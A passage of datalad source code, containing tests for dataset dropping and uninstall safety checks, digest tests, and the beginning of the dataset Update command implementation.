DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n OBSCURE_FILENAME,\n assert_in,\n assert_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n eq_,\n get_deeply_nested_structure,\n known_failure_githubci_win,\n nok_,\n ok_,\n with_tempfile,\n)\nfrom datalad.utils import chpwd\n\n\nckwa = dict(result_renderer='disabled')\n\n\n@with_tempfile\n@with_tempfile\ndef test_drop_file_content(path=None, outside_path=None):\n # see docstring for test data structure\n ds = get_deeply_nested_structure(path)\n axfile_rootds = op.join(\"subdir\", \"annexed_file.txt\")\n axfile_subds = op.join(\"subds_modified\", \"subdir\", \"annexed_file.txt\")\n gitfile = op.join(\"subdir\", \"git_file.txt\")\n\n # refuse to operate on non-ds paths\n assert_in_results(\n ds.drop(outside_path, on_failure='ignore'),\n status='error',\n message=('path not underneath the reference dataset %s', ds)\n )\n # we only have a single copy of annexed files right now\n # check that it is not dropped by default\n with assert_raises(IncompleteResultsError) as cme:\n ds.drop(axfile_rootds)\n # The --force suggestion from git-annex-drop is translated to --reckless.\n assert_in(\"--reckless\", str(cme.value))\n\n # error on non-existing paths\n non_existant_relpaths = ['funky', op.join('subds_modified', 'subfunky')]\n res = ds.drop(non_existant_relpaths, on_failure='ignore')\n # only two results, one per file\n assert_result_count(res, len(non_existant_relpaths))\n for rp in non_existant_relpaths:\n assert_in_results(\n res,\n type='file',\n status='error',\n action='drop',\n error_message='File unknown to git',\n path=str(ds.pathobj / rp),\n refds=ds.path,\n )\n\n # drop multiple files from different datasets\n ok_(ds.repo.file_has_content(axfile_rootds))\n res = ds.drop(\n [axfile_rootds, axfile_subds],\n reckless='availability',\n jobs=2,\n on_failure='ignore')\n nok_(ds.repo.file_has_content(axfile_rootds))\n assert_result_count(res, 2)\n for rp in [axfile_rootds, axfile_subds]:\n assert_in_results(\n res,\n type='file',\n status='ok',\n action='drop',\n path=str(ds.pathobj / rp),\n refds=ds.path,\n )\n\n # dropping file content for files in git\n res = ds.drop(gitfile, on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(\n res,\n type='file',\n # why is this 'notneeded' and not 'impossible'\n # if the latter, any operation on any dataset with a\n # single file in git would fail\n status='notneeded',\n action='drop',\n message=\"no annex'ed content\",\n path=str(ds.pathobj / gitfile),\n refds=ds.path,\n )\n\n # modified files, we cannot drop their content\n modfile = ds.pathobj / axfile_rootds\n modfile.unlink()\n modfile.write_text('new content')\n res = ds.drop(modfile, on_failure='ignore')\n assert_in_results(\n res,\n status='impossible',\n action='drop',\n message=\"cannot drop modified content, save first\",\n path=str(modfile),\n refds=ds.path,\n )\n\n # detection of untracked content\n untrackeddir = ds.pathobj / 'subds_modified' / 'subds_lvl1_modified' / \\\n f'{OBSCURE_FILENAME}_directory_untracked'\n res = ds.drop(untrackeddir, on_failure='ignore')\n assert_in_results(\n res,\n status='impossible',\n action='drop',\n message=\"cannot drop untracked content, save first\",\n path=str(untrackeddir),\n type='directory',\n refds=ds.path,\n )\n\n # and lastly, recursive drop\n res = ds.drop(recursive=True, on_failure='ignore')\n # there is not much to test here (we already dropped the only\n # annexed files above). however, we should see results from the top\n # ds, and the most-bottom ds\n # subdatasets\n for p in [ds.pathobj / 'subdir' / 'file_modified',\n untrackeddir]:\n assert_in_results(res, path=str(p))\n\n\n@with_tempfile\n@with_tempfile\ndef test_drop_allkeys(origpath=None, clonepath=None):\n # create a dataset with two keys, belonging to two files,\n # in two different branches\n ds = Dataset(origpath).create()\n repo = ds.repo\n repo.call_git(['checkout', '-b', 'otherbranch'])\n (ds.pathobj / 'file1').write_text('file1')\n ds.save()\n repo.call_git(['checkout', DEFAULT_BRANCH])\n (ds.pathobj / 'file2').write_text('file2')\n ds.save()\n\n # confirm we have two keys\n eq_(2, repo.call_annex_records(['info'])[0]['local annex keys'])\n\n # do it wrong first\n assert_in_results(\n ds.drop('some', what='allkeys', on_failure='ignore'),\n status='impossible',\n type='dataset',\n action='drop',\n message=(\n 'cannot drop %s, with path constraints given: %s',\n 'allkeys', [ds.pathobj / 'some']),\n )\n # confirm we still have two keys\n eq_(2, repo.call_annex_records(['info'])[0]['local annex keys'])\n\n # clone the beast and get all keys into the clone\n dsclone = clone(ds.path, clonepath)\n dsclone.repo.call_annex(['get', '--all'])\n # confirm we have two keys in the clone\n eq_(2, dsclone.repo.call_annex_records(['info'])[0]['local annex keys'])\n\n # now cripple availability by dropping the \"hidden\" key at origin\n repo.call_annex(['drop', '--branch', 'otherbranch', '--force'])\n # confirm one key left\n eq_(1, repo.call_annex_records(['info'])[0]['local annex keys'])\n\n # and now drop all keys from the clone, one is redundant and can be\n # dropped, the other is not and must fail\n res = dsclone.drop(what='allkeys', jobs=2, on_failure='ignore')\n # confirm one key gone, one left\n eq_(1, dsclone.repo.call_annex_records(['info'])[0]['local annex keys'])\n assert_result_count(res, 1, action='drop', status='error', type='key')\n assert_result_count(res, 1, action='drop', status='ok', type='key')\n # now force it\n res = dsclone.drop(what='allkeys', reckless='availability',\n on_failure='ignore')\n assert_result_count(res, 1)\n assert_result_count(res, 1, action='drop', status='ok', type='key')\n # all gone\n eq_(0, dsclone.repo.call_annex_records(['info'])[0]['local annex keys'])\n\n\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_undead_annex_detection(gitpath=None, origpath=None, clonepath=None):\n gitds = Dataset(gitpath).create(annex=False)\n # a gitrepo can be inspected too, it might just not know anything\n eq_([], _detect_nondead_annex_at_remotes(gitds.repo, 'someid'))\n\n origds = Dataset(origpath).create()\n origrepo = origds.repo\n # only the local repo knows about its own annex\n eq_([None], _detect_nondead_annex_at_remotes(origrepo, origrepo.uuid))\n\n # works with clones\n cloneds = clone(origds, clonepath)\n clonerepo = cloneds.repo\n # the clone now know two locations, itself and origin\n eq_([None, DEFAULT_REMOTE],\n _detect_nondead_annex_at_remotes(clonerepo, origrepo.uuid))\n # just from cloning the original repo location does not learn\n # about the new annex in the clone\n eq_([], _detect_nondead_annex_at_remotes(origrepo, clonerepo.uuid))\n # it will know after a push\n cloneds.push()\n eq_([None], _detect_nondead_annex_at_remotes(origrepo, clonerepo.uuid))\n # we can declare an annex dead (here done at original location)\n origrepo.call_annex(['dead', clonerepo.uuid])\n eq_([], _detect_nondead_annex_at_remotes(origrepo, clonerepo.uuid))\n # again not automatically communicated to clones\n eq_([None, DEFAULT_REMOTE],\n _detect_nondead_annex_at_remotes(clonerepo, clonerepo.uuid))\n # but a fetch will make the death known\n clonerepo.call_git(['fetch'])\n eq_([None],\n _detect_nondead_annex_at_remotes(clonerepo, clonerepo.uuid))\n # after a local git-annex branch synchronization, it is completely\n # \"gone\"\n clonerepo.localsync()\n eq_([],\n _detect_nondead_annex_at_remotes(clonerepo, clonerepo.uuid))\n\n\n@with_tempfile\ndef test_uninstall_recursive(path=None):\n ds = Dataset(path)\n assert_raises(ValueError, ds.drop)\n\n ds = ds.create()\n subds = ds.create('sub')\n\n # fail to uninstall with subdatasets present\n res = ds.drop(\n what='all', reckless='availability', on_failure='ignore')\n assert_in_results(\n res,\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='error',\n message=('cannot drop dataset, subdataset(s) still present '\n '(forgot --recursive?): %s', [subds.path]),\n )\n res = ds.drop(\n what='all', reckless='availability', recursive=True,\n on_failure='ignore')\n # both datasets gone\n assert_result_count(res, 2)\n assert_result_count(res, 2, type='dataset', status='ok')\n # the subdataset is reported first\n eq_([subds.path, ds.path],\n [r.get('path') for r in res])\n # no dataset installed anymore\n eq_(ds.is_installed(), False)\n # not even a trace\n eq_(ds.pathobj.exists(), False)\n\n\n@with_tempfile\n@with_tempfile\ndef test_unpushed_state_detection(origpath=None, clonepath=None):\n origds = Dataset(origpath).create()\n # always test in annex mode\n tester = lambda x: _detect_unpushed_revs(x, True)\n\n origrepo = origds.repo\n # this is still a unique repo, all payload branches are\n # unpushed\n eq_([DEFAULT_BRANCH], tester(origrepo))\n origrepo.call_git(['checkout', '-b', 'otherbranch'])\n eq_([DEFAULT_BRANCH, 'otherbranch'],\n tester(origrepo))\n # let's advance the state by one\n (origds.pathobj / 'file1').write_text('some text')\n origds.save()\n # same picture\n eq_([DEFAULT_BRANCH, 'otherbranch'],\n tester(origrepo))\n # back to original branch\n origrepo.call_git(['checkout', DEFAULT_BRANCH])\n\n # now lets clone\n cloneds = clone(origds, clonepath)\n clonerepo = cloneds.repo\n # right after the clone there will be no unpushed changes\n eq_([], tester(clonerepo))\n # even with more than one branch in the clone\n clonerepo.call_git(['checkout', '-t', f'{DEFAULT_REMOTE}/otherbranch'])\n eq_([], tester(clonerepo))\n\n # let's advance the local state now\n (cloneds.pathobj / 'file2').write_text('some other text')\n cloneds.save()\n # only the modified branch is detected\n eq_(['otherbranch'], tester(clonerepo))\n # a push will bring things into the clear\n cloneds.push(to=DEFAULT_REMOTE)\n eq_([], tester(clonerepo))\n\n # now detach HEAD, should work and not somehow require a branch\n cloneds.repo.call_git(['reset', '--hard', 'HEAD~1'])\n # we have this state\n eq_([], tester(clonerepo))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile\n@with_tempfile\ndef test_safetynet(otherpath=None, origpath=None, clonepath=None):\n # we start with a dataset that is hosted somewhere\n origds = Dataset(origpath).create()\n # a clone is made to work on the dataset\n cloneds = clone(origds, clonepath)\n # checkout a different branch at origin to simplify testing below\n origds.repo.call_git(['checkout', '-b', 'otherbranch'])\n\n # an untracked file is added to simulate some work\n (cloneds.pathobj / 'file1').write_text('some text')\n # now we try to drop the entire dataset in a variety of ways\n # to check that it does not happen too quickly\n\n # cannot use invalid mode switch values\n assert_raises(ValueError, drop, what='bananas')\n assert_raises(ValueError, drop, reckless='rubberducky')\n\n # cannot simple run drop somewhere and give a path to a dataset\n # to drop\n with chpwd(otherpath):\n assert_raises(NoDatasetFound, drop, clonepath, what='all')\n ok_(cloneds.is_installed())\n\n # refuse to remove the CWD\n with chpwd(clonepath):\n assert_raises(RuntimeError, drop, what='all')\n ok_(cloneds.is_installed())\n\n assert_in_results(\n cloneds.drop(what='all', on_failure='ignore'),\n message='cannot drop untracked content, save first',\n status='impossible')\n ok_(cloneds.is_installed())\n\n # so let's save...\n cloneds.save()\n # - branch is progressed\n # - a new key is only available here\n res = cloneds.drop(what='all', on_failure='ignore')\n assert_in_results(res, action=\"uninstall\", status=\"error\")\n ok_(res[0]['message'][0].startswith(\n \"to-be-dropped dataset has revisions \"\n \"that are not available at any known sibling\"))\n ok_(cloneds.is_installed())\n\n # so let's push -- git only\n # we cannot use git-push directly, it would not handle\n # managed branches properly\n cloneds.push(data='nothing')\n\n res = cloneds.drop(what='all', on_failure='ignore')\n assert_in_results(res, action=\"uninstall\", status=\"error\")\n ok_(res[0]['message'][0].startswith(\n \"to-be-deleted local annex not declared 'dead'\"))\n # some windows test setup is not very robust, explicitly\n # include the default name \"origin\" in the test success\n # conditions to make this more robust\n eq_(res[0]['message'][1], [DEFAULT_REMOTE])\n ok_(cloneds.is_installed())\n\n # announce dead\n cloneds.repo.call_annex(['dead', 'here'])\n # but just a local declaration is not good enough\n assert_in_results(\n cloneds.drop(what='all', on_failure='ignore'),\n status='error')\n ok_(cloneds.is_installed())\n\n # so let's push that announcement also\n cloneds.push(data='nothing')\n\n res = cloneds.drop(what='all', on_failure='ignore')\n assert_in_results(res, action=\"drop\", status=\"error\")\n ok_(res[0]['message'].startswith(\n \"unsafe\\nCould only verify the existence of \"\n \"0 out of 1 necessary\"),\n msg=f\"Results were {res}\")\n ok_(cloneds.is_installed())\n\n # so let's push all\n cloneds.push()\n\n # and kill the beast!\n res = cloneds.drop(what='all', on_failure='ignore')\n # only now we also drop the key!\n assert_result_count(res, 2)\n assert_in_results(\n res, action='drop', type='key', status='ok', path=cloneds.path)\n assert_in_results(\n res, action='uninstall', type='dataset', status='ok', path=cloneds.path)\n\n\n@with_tempfile\ndef test_kill(path=None):\n # create a complicated and dirty mess\n ds = get_deeply_nested_structure(path)\n # cannot use kill without recursion enabled, because there will be no\n # checks for subdatasets, hence we cannot make the impression that\n # this would be a surgical operation\n assert_raises(ValueError, ds.drop, what='all', reckless='kill')\n # wipe it out\n res = ds.drop(what='all', reckless='kill', recursive=True)\n assert_result_count(res, 1)\n assert_in_results(\n res,\n status='ok',\n path=ds.path,\n type='dataset',\n action='uninstall',\n )\n eq_(False, ds.is_installed())\n eq_(False, ds.pathobj.exists())\n\n\n@with_tempfile\ndef test_kill_7013(path=None):\n \"\"\"check that a recursive kill does not silently skip subdatasets\n contained in subdirectory: github.com/datalad/datalad/issues/7013\"\"\"\n ds = Dataset(path).create()\n (ds.pathobj / 'subdir' / 'subsubdir' / 'subsubsubdir').mkdir(parents=True)\n ds.create('subdir/subdir/subds')\n ds.create('subdir/subds')\n ds.create('subds')\n res = ds.drop(path=['subds', 'subdir'], what='all',\n reckless='kill', recursive=True)\n # ensure that both subdatasets were killed\n subs = ds.subdatasets(state='present')\n assert len(subs) == 0\n\n\n@with_tempfile()\ndef test_refuse_to_drop_cwd(path=None):\n ds = Dataset(path).create()\n (ds.pathobj / 'deep' / 'down').mkdir(parents=True)\n for p in (ds.pathobj, ds.pathobj / 'deep', ds.pathobj / 'deep' / 'down'):\n with chpwd(str(p)):\n # will never remove PWD, or anything outside the dataset\n for target in (ds.pathobj, os.curdir, os.pardir, op.join(os.pardir, os.pardir)):\n assert_raises(RuntimeError, drop, path=target, what='all')\n sub = ds.create('sub')\n subsub = sub.create('subsub')\n for p in (sub.path, subsub.path):\n with chpwd(p):\n assert_raises(RuntimeError, drop, what='all')\n\n\n@with_tempfile()\ndef test_careless_subdataset_uninstall(path=None):\n # nested datasets\n ds = Dataset(path).create()\n subds1 = ds.create('deep1')\n ds.create('deep2')\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['deep1', 'deep2'])\n assert_repo_status(ds.path)\n # now we kill the sub without the parent knowing\n subds1.drop(what='all', reckless='kill', recursive=True)\n ok_(not subds1.is_installed())\n # mountpoint exists\n ok_(subds1.pathobj.exists())\n assert_repo_status(ds.path)\n # parent still knows the sub\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['deep1', 'deep2'])\n\n\n@with_tempfile(mkdir=True)\ndef test_drop_nocrash_absent_subds(path=None):\n parent = Dataset(path).create()\n parent.create('sub')\n parent.drop('sub', reckless='availability')\n assert_repo_status(parent.path)\n with chpwd(path):\n assert_status('notneeded', drop('.', recursive=True))\n\n\n@with_tempfile(mkdir=True)\ndef test_uninstall_without_super(path=None):\n # a parent dataset with a proper subdataset, and another dataset that\n # is just placed underneath the parent, but not an actual subdataset\n parent = Dataset(path).create()\n sub = parent.create('sub')\n assert_repo_status(parent.path)\n nosub = create(op.join(parent.path, 'nosub'))\n assert_repo_status(nosub.path)\n subreport = parent.subdatasets()\n assert_result_count(subreport, 1, path=sub.path)\n assert_result_count(subreport, 0, path=nosub.path)\n # it should be possible to uninstall the proper subdataset, even without\n # explicitly calling the uninstall methods of the parent -- things should\n # be figured out by datalad\n with chpwd(parent.path):\n # check False because revisions are not pushed\n drop(sub.path, what='all', reckless='availability')\n nok_(sub.is_installed())\n # no present subdatasets anymore\n subreport = parent.subdatasets()\n assert_result_count(subreport, 1)\n assert_result_count(subreport, 1, path=sub.path, state='absent')\n assert_result_count(subreport, 0, path=nosub.path)\n # but we should fail on an attempt to uninstall the non-subdataset\n with chpwd(nosub.path):\n assert_raises(RuntimeError, drop, what='all')\n\n\n@with_tempfile\ndef test_drop_from_git(path=None):\n ds = Dataset(path).create(annex=False)\n res = ds.drop()\n assert_in_results(res, action='drop', status='notneeded')\n (ds.pathobj / 'file').write_text('some')\n ds.save()\n assert_status('notneeded', ds.drop('file'))\n assert_status('notneeded', ds.drop(what='allkeys'))\n\n\n# https://github.com/datalad/datalad/issues/6180\n@with_tempfile\n@with_tempfile\ndef test_drop_uninit_annexrepo(origpath=None, path=None):\n Dataset(origpath).create()\n # just git-clone to bypass `git annex init`\n GitRepo.clone(origpath, path)\n ds = Dataset(path)\n assert_status('ok', ds.drop(what='datasets'))\n nok_(ds.is_installed())\n\n\n# https://github.com/datalad/datalad/issues/6577\n@with_tempfile\ndef test_drop_allkeys_result_contains_annex_error_messages(path=None):\n # when calling drop with allkeys, expect git-annex error\n # message(s) to be present in the result record error_message\n ds = Dataset(path).create()\n # mock annex call always yielding error-messages in this dataset\n with patch.object(ds.repo, '_call_annex_records_items_') as mock_call:\n mock_call.return_value = iter([{\n 'command': 'drop',\n 'success': False,\n 'error-messages': ['git-annex error message here']}])\n assert_in_results(\n ds.drop(what='allkeys', on_failure='ignore'),\n error_message='git-annex error message here',\n )\n\n\n# https://github.com/datalad/datalad/issues/6948\n@known_failure_githubci_win # recent git-annex, https://github.com/datalad/datalad/issues/7197\n@with_tempfile\n@with_tempfile\ndef test_nodrop_symlinked_annex(origpath=None, clonepath=None):\n # create a dataset with a key\n ds = Dataset(origpath).create(**ckwa)\n testfile = ds.pathobj / 'file1'\n testcontent = 'precious'\n testfile.write_text(testcontent)\n ds.save(**ckwa)\n rec = ds.status(testfile, annex='availability',\n return_type='item-or-list', **ckwa)\n eq_(testcontent, Path(rec['objloc']).read_text())\n\n def _droptest(_ds):\n # drop refuses to drop from a symlinked annex\n if (_ds.repo.dot_git / 'annex').is_symlink():\n assert_raises(AssertionError, _ds.drop, **ckwa)\n for what in ('all', 'allkeys', 'filecontent', 'datasets'):\n assert_raises(AssertionError, _ds.drop, what=what, **ckwa)\n # but a reckless kill works without crashing\n _ds.drop(what='all', recursive=True, reckless='kill', **ckwa)\n nok_(_ds.is_installed())\n # nothing has made the original file content vanish\n _rec = ds.status(\n testfile, annex='availability',\n return_type='item-or-list', **ckwa)\n eq_(testcontent, Path(_rec['objloc']).read_text())\n\n # test on a clone that does not know it has key access\n dsclone1 = clone(ds.path, clonepath, reckless='ephemeral', **ckwa)\n _droptest(dsclone1)\n\n # test again on a clone that does think it has a key copy\n dsclone2 = clone(ds.path, clonepath, reckless='ephemeral', **ckwa)\n if not dsclone2.repo.is_managed_branch():\n # it really should not matter, but 'origin' is set to annex.ignore=true\n # on crippledFS\n # https://github.com/datalad/datalad/issues/6960\n dsclone2.get('.')\n _droptest(dsclone2)\n" }, { "alpha_fraction": 0.3653061091899872, "alphanum_fraction": 0.6214285492897034, "avg_line_length": 38.20000076293945, "blob_id": "0beaa636267346d47799d0e3c29c9baa773b3433", "content_id": "76c4558f5795c61f3100eb8da9bb6e9d0a025871", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1960, "license_type": "permissive", "max_line_length": 153, "num_lines": 50, "path": "/datalad/support/tests/test_digests.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom os.path import join as opj\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n with_tree,\n)\n\nfrom ..digests import Digester\n\n\n@with_tree(tree={'sample.txt': '123',\n '0': chr(0),\n 'long.txt': '123abz\\n'*1000000})\ndef test_digester(path=None):\n digester = Digester()\n assert_equal(\n digester(opj(path, 'sample.txt')),\n {\n 'md5': '202cb962ac59075b964b07152d234b70',\n 'sha1': '40bd001563085fc35165329ea1ff5c5ecbdbbeef',\n 'sha256': 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3',\n 'sha512': '3c9909afec25354d551dae21590bb26e38d53f2173b8d3dc3eee4c047e7ab1c1eb8b85103e3be7ba613b31bb5c9c36214dc9f14a42fd7a2fdb84856bca5c44c2'\n })\n\n assert_equal(\n digester(opj(path, '0')),\n {\n 'md5': '93b885adfe0da089cdf634904fd59f71',\n 'sha1': '5ba93c9db0cff93f52b521d7420e43f6eda2784f',\n 'sha256': '6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d',\n 'sha512': 'b8244d028981d693af7b456af8efa4cad63d282e19ff14942c246e50d9351d22704a802a71c3580b6370de4ceb293c324a8423342557d4e5c38438f0e36910ee',\n })\n\n assert_equal(\n digester(opj(path, 'long.txt')),\n {\n 'md5': '81b196e3d8a1db4dd2e89faa39614396',\n 'sha1': '5273ac6247322c3c7b4735a6d19fd4a5366e812f',\n 'sha256': '80028815b3557e30d7cbef1d8dbc30af0ec0858eff34b960d2839fd88ad08871',\n 'sha512': '684d23393eee455f44c13ab00d062980937a5d040259d69c6b291c983bf635e1d405ff1dc2763e433d69b8f299b3f4da500663b813ce176a43e29ffcc31b0159'\n })\n" }, { "alpha_fraction": 0.5333905220031738, "alphanum_fraction": 0.5337584018707275, "avg_line_length": 38.98039245605469, "blob_id": "63e36be693d9e10620a0686610154a3b2bed087f", "content_id": "4dde06d526fec5bf67fa27ca2aa693906a2197c8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24468, "license_type": "permissive", "max_line_length": 98, "num_lines": 612, "path": "/datalad/distribution/update.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for updating a dataset\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nfrom os.path import lexists\nimport itertools\n\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.interface.results import (\n get_status_dict,\n YieldDatasets\n)\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureStr,\n EnsureNone,\n)\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CapturedException,\n CommandError\n)\nfrom datalad.support.param import Parameter\nfrom datalad.interface.common_opts import (\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.distribution.dataset import require_dataset\n\nfrom .dataset import (\n EnsureDataset,\n datasetmethod,\n)\n\nlgr = logging.getLogger('datalad.distribution.update')\n\n\nclass YieldDatasetAndRevision(YieldDatasets):\n \"\"\"Like YieldDatasets, but also provide \"gitshasum\" value, if any.\n \"\"\"\n def __call__(self, res):\n ds = super(YieldDatasetAndRevision, self).__call__(res)\n return ds, res.get(\"gitshasum\")\n\n\ndef _process_how_args(merge, how, how_subds):\n \"\"\"Resolve how-related arguments into `how` and `how_subds` values.\n \"\"\"\n # Translate old --merge value onto --how\n if merge and (how or how_subds):\n raise ValueError(\"`merge` is incompatible with `how` and `how_subds`\")\n elif merge == \"ff-only\":\n how = merge\n elif merge:\n how = \"merge\"\n\n if how == \"fetch\":\n how = None\n\n # Map \"fetch\" to None for easier conditions.\n if how_subds == \"fetch\":\n how_subds = None\n elif how_subds is None:\n # Subdatasets are updated according to --how unless --how-subds is\n # given.\n how_subds = how\n return how, how_subds\n\n\n_how_constraints = EnsureChoice(\n \"fetch\", \"merge\", \"ff-only\", \"reset\", \"checkout\", None)\n\n\n@build_doc\nclass Update(Interface):\n \"\"\"Update a dataset from a sibling.\n\n \"\"\"\n # TODO: adjust docs to say:\n # - update from just one sibling at a time\n\n _examples_ = [\n dict(text=\"Update from a particular sibling\",\n code_py=\"update(sibling='siblingname')\",\n code_cmd=\"datalad update -s <siblingname>\"),\n dict(text=\"Update from a particular sibling and merge the changes \"\n \"from a configured or matching branch from the sibling \"\n \"(see [CMD: --follow CMD][PY: `follow` PY] for details)\",\n code_py=\"update(sibling='siblingname', how='merge')\",\n code_cmd=\"datalad update --how=merge -s <siblingname>\"),\n dict(text=\"Update from the sibling 'origin', traversing into \"\n \"subdatasets. For subdatasets, merge the revision \"\n \"registered in the parent dataset into the current branch\",\n code_py=\"update(sibling='origin', how='merge', \"\n \"follow='parentds', recursive=True)\",\n code_cmd=\"datalad update -s origin --how=merge \"\n \"--follow=parentds -r\"),\n dict(text=\"Fetch and merge the remote tracking branch \"\n \"into the current dataset. Then update each subdataset \"\n \"by resetting its current branch to the revision \"\n \"registered in the parent dataset, fetching only if \"\n \"the revision isn't already present\",\n code_py=\"update(how='merge', how_subds='reset', \"\n \"follow='parentds-lazy', recursive=True)\",\n code_cmd=\"datalad update --how=merge --how-subds=reset\"\n \"--follow=parentds-lazy -r\"),\n ]\n\n _params_ = dict(\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"\"\"constrain to-be-updated subdatasets to the given path for recursive\n operation.\"\"\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n sibling=Parameter(\n args=(\"-s\", \"--sibling\",),\n doc=\"\"\"name of the sibling to update from. When unspecified,\n updates from all siblings are fetched. If there is more than one\n sibling and changes will be brought into the working tree (as\n requested via [CMD: --merge, --how, or --how-subds CMD][PY:\n `merge`, `how`, or `how_subds` PY]), a sibling will be chosen based\n on the configured remote for the current branch.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to update. If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n merge=Parameter(\n args=(\"--merge\",),\n metavar=\"ALLOWED\",\n # const and nargs are set to map --merge to --merge=any.\n const=\"any\",\n nargs=\"?\",\n constraints=EnsureBool() | EnsureChoice(\"any\", \"ff-only\"),\n # TODO: Decide whether this should be removed eventually.\n doc=\"\"\"merge obtained changes from the sibling. This is a subset of\n the functionality that can be achieved via the newer [CMD: --how\n CMD][PY: `how` PY]. [CMD: --merge or --merge=any CMD][PY:\n merge=True or merge=\"any\" PY] is equivalent to [CMD: --how=merge\n CMD][PY: how=\"merge\" PY]. [CMD: --merge=ff-only CMD][PY:\n merge=\"ff-only\" PY] is equivalent to [CMD: --how=ff-only CMD][PY:\n how=\"ff-only\" PY].\"\"\"),\n how=Parameter(\n args=(\"--how\",),\n nargs=\"?\",\n constraints=_how_constraints,\n doc=\"\"\"how to update the dataset. The default (\"fetch\") simply\n fetches the changes from the sibling but doesn't incorporate them\n into the working tree. A value of \"merge\" or \"ff-only\" merges in\n changes, with the latter restricting the allowed merges to\n fast-forwards. \"reset\" incorporates the changes with 'git reset\n --hard <target>', staying on the current branch but discarding any\n changes that aren't shared with the target. \"checkout\", on the\n other hand, runs 'git checkout <target>', switching from the\n current branch to a detached state. When [CMD: --recursive CMD][PY:\n recursive=True PY] is specified, this action will also apply to\n subdatasets unless overridden by [CMD: --how-subds CMD][PY:\n `how_subds` PY].\"\"\"),\n how_subds=Parameter(\n args=(\"--how-subds\",),\n nargs=\"?\",\n constraints=_how_constraints,\n doc=\"\"\"Override the behavior of [CMD: --how CMD][PY: `how` PY] in\n subdatasets.\"\"\"),\n follow=Parameter(\n args=(\"--follow\",),\n constraints=EnsureChoice(\"sibling\", \"parentds\", \"parentds-lazy\"),\n doc=\"\"\"source of updates for subdatasets. For 'sibling', the update\n will be done by merging in a branch from the (specified or\n inferred) sibling. The branch brought in will either be the current\n branch's configured branch, if it points to a branch that belongs\n to the sibling, or a sibling branch with a name that matches the\n current branch. For 'parentds', the revision registered in the\n parent dataset of the subdataset is merged in. 'parentds-lazy' is\n like 'parentds', but prevents fetching from a subdataset's sibling\n if the registered revision is present in the subdataset. Note that\n the current dataset is always updated according to 'sibling'. This\n option has no effect unless a merge is requested and [CMD:\n --recursive CMD][PY: recursive=True PY] is specified.\"\"\", ),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n fetch_all=Parameter(\n args=(\"--fetch-all\",),\n action=\"store_true\",\n doc=\"\"\"this option has no effect and will be removed in a future version.\n When no siblings are given, an all-sibling update will be performed.\"\"\", ),\n reobtain_data=Parameter(\n args=(\"--reobtain-data\",),\n action=\"store_true\",\n doc=\"\"\"if enabled, file content that was present before an update\n will be re-obtained in case a file was changed by the update.\"\"\"), )\n\n @staticmethod\n @datasetmethod(name='update')\n @eval_results\n def __call__(\n path=None,\n *,\n sibling=None,\n merge=False,\n how=None,\n how_subds=None,\n follow=\"sibling\",\n dataset=None,\n recursive=False,\n recursion_limit=None,\n fetch_all=None,\n reobtain_data=False):\n if fetch_all is not None:\n lgr.warning('update(fetch_all=...) called. Option has no effect, and will be removed')\n if path and not recursive:\n lgr.warning('path constraints for subdataset updates ignored, '\n 'because `recursive` option was not given')\n\n how, how_subds = _process_how_args(merge, how, how_subds)\n # `merge` should be considered through `how` and `how_subds` only.\n # Unbind `merge` to ensure that downstream code doesn't look at it.\n del merge\n\n refds = require_dataset(dataset, check_installed=True, purpose='update')\n\n save_paths = []\n update_failures = set()\n saw_subds = False\n for ds, revision in itertools.chain([(refds, None)], refds.subdatasets(\n path=path,\n state='present',\n recursive=recursive,\n recursion_limit=recursion_limit,\n return_type='generator',\n result_renderer='disabled',\n result_xfm=YieldDatasetAndRevision()) if recursive else []):\n if ds != refds:\n saw_subds = True\n repo = ds.repo\n is_annex = isinstance(repo, AnnexRepo)\n # prepare return value\n res = get_status_dict('update', ds=ds, logger=lgr, refds=refds.path)\n\n follow_parent = revision and follow.startswith(\"parentds\")\n follow_parent_lazy = revision and follow == \"parentds-lazy\"\n if follow_parent_lazy and 